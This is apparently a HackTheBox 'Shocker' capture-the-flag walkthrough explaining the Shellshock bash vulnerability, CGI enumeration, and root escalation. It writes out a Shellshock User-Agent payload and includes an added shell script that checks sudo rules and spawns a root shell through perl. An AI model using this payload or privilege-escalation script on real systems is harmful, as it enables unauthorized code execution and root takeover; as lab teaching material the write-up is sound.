HackTheBox: Shocker Walkthrough

Shellshock (CVE-2014-6271) was one of the most famous vulnerabilities of the last decade, if not ever. It existed because bash imported function definitions from environment variables: any variable whose value began with “() {” was parsed as a function, and bash then went on to execute whatever followed the closing “};”. Anything that copied attacker-controlled input into the environment of a bash process, CGI request headers being the classic case, therefore gave the attacker arbitrary command execution. Shocker provides an easy machine to demonstrate this, so let’s get into it.

Enumeration

The nmap scan revealed a web server with SSH enabled. Pretty standard stuff. I decided to run gobuster and visit the webpage to enumerate further after this:

Gobuster initially revealed nothing, but running it again with the --addslash flag revealed much more (Apache answers /cgi-bin with a 404 but /cgi-bin/ with a 403, so the directory only shows up when the trailing slash is appended). After that, I searched within cgi-bin for potential scripts that could be publicly accessible. I found a script called user.sh, which is interesting.

Visiting the website yielded nothing of interest.

Back to the script I found. A script under cgi-bin is executed by Apache’s CGI module, which copies request headers such as User-Agent into environment variables before running it. The Apache version discovered in the nmap scan suggests an old enough install, but what actually matters is the interpreter behind the script: if user.sh is run by an unpatched bash, there’s a high probability that this server is vulnerable to Shellshock.

I decided to try to exploit that.

Exploitation

Notes about the command: -H sets the User-Agent header to “() { :; }; echo Content-Type: text/html; echo; echo hello”. The first part is obviously the famous Shellshock string: an empty function definition, after which bash keeps executing the rest of the value. The second part, “echo Content-Type: text/html”, emits a valid CGI response header so the output comes back through curl in a readable form. The third part, the bare echo, prints the blank line that terminates the CGI headers; Apache requires it before any body, otherwise it answers with a server error and the command output never reaches us. The last part is the command we want to run. Moving on.

The curl statement returned hello, which is exactly what we wanted.

Now to exploit the vulnerability, I simply created a reverse shell and caught it with netcat, which went like this:

Got a shell. Now time for some internal enumeration and privesc.

Internal Enumeration and Privilege Escalation

Shelly can run perl scripts as root. The path to root is obvious now, and looks like this:
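An added example of that path, not the author’s screenshot: check the sudo listing for a rule that runs perl as root, then use perl’s exec to replace the root-owned perl process with a shell. The sudo listing embedded below is constructed sample text for the offline check; the hostname, username and rule in it are assumptions.

```sh
#!/bin/sh
# Added example (not from the walkthrough): sudo + perl privilege escalation.

# Return 0 when a "sudo -l" listing contains an explicit rule allowing
# /usr/bin/perl as root (or ALL), with or without tags such as NOPASSWD:.
# Takes the listing as $1 so it can be checked offline. Rules granting "ALL"
# as the command would also cover perl but are not matched here.
sudo_allows_perl_as_root() {
    printf '%s\n' "$1" | grep -Eq \
        '^[[:space:]]*\((root|ALL)([[:space:]]*:[^)]*)?\)[[:space:]]+([A-Z]+:[[:space:]]*)*/usr/bin/perl([[:space:]]|,|$)'
}

# Constructed sample of a "sudo -l" listing (hypothetical host and user).
SAMPLE_SUDO_L='Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl'

# Escalate: sudo runs perl as root, and exec replaces that process with bash,
# which therefore inherits uid 0.
perl_root_shell() {
    sudo /usr/bin/perl -e 'exec "/bin/bash";'
}

# Usage: ./privesc.sh check | root
case "${1:-}" in
    check)
        if sudo_allows_perl_as_root "$(sudo -n -l 2>/dev/null)"; then
            echo "perl runnable as root via sudo"
        else
            echo "no explicit perl sudo rule"
        fi ;;
    root) perl_root_shell ;;
esac
```

`sudo -n -l` is used in the check so it never blocks on a password prompt inside a non-interactive reverse shell; a rule that requires a password still matches the pattern, you would just have to supply one when calling `root`.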

So that’s it!

This box was an easy boot-to-root and a great medium for learning a bit of computer science history. Until next time!

Matt Johnson
Freelance cybersecurity consultant based in Düsseldorf, Germany.